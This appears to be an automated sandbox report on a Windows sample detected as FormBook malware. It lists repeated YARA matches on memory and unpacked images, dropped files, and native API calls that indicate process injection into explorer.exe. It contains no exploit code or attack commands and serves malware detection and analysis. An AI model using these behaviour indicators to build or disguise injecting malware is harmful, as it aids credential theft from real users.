Source: Yara match | File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\explorer.exe | Dropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini
Source: C:\Windows\SysWOW64\explorer.exe | Dropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00458784 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0043D6BC NtdllDefWindowProc_A,GetCapture
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0044D1BC GetSubMenu,SaveDC,RestoreDC,731EB080,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00419CA0 NtCreateFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00419D50 NtReadFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00419DD0 NtClose
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00419E80 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00419C9A NtCreateFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A399A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A395D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A398A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39820 NtEnumerateKey
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A3B040 NtSuspendThread
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A399D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39950 NtQueueApcThread
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39A10 NtQuerySection
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A3A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39B00 NtSetValueKey
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A395F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A3AD30 NtSetContextThread
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39560 NtWriteFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A396D0 NtCreateKey
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39650 NtQueryValueKey
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39FE0 NtCreateMutant
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A3A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39760 NtOpenProcess
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A39770 NtSetInformationFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_2_00A3A770 NtOpenThread
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_1_00419CA0 NtCreateFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_1_00419D50 NtReadFile
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 1_1_00419DD0 NtClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048699A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048695D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869560 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048696D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869610 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869B00 NtSetValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869770 NtSetInformationFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048698A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048698F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869820 NtEnumerateKey
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0486B040 NtSuspendThread
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048699D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048695F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0486AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869950 NtQueueApcThread
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869A10 NtQuerySection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869A20 NtResumeThread
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_048697A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0486A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0486A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04869760 NtOpenProcess
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0486A770 NtOpenThread
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00239CA0 NtCreateFile
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00239D50 NtReadFile
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00239DD0 NtClose
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00239E80 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00239C9A NtCreateFile
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0482B150 appears 35 times
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: String function: 009FB150 appears 32 times
Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: String function: 00406A94 appears 57 times
Source: R6o4qCis6s.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: R6o4qCis6s.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: R6o4qCis6s.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe
Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe
Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
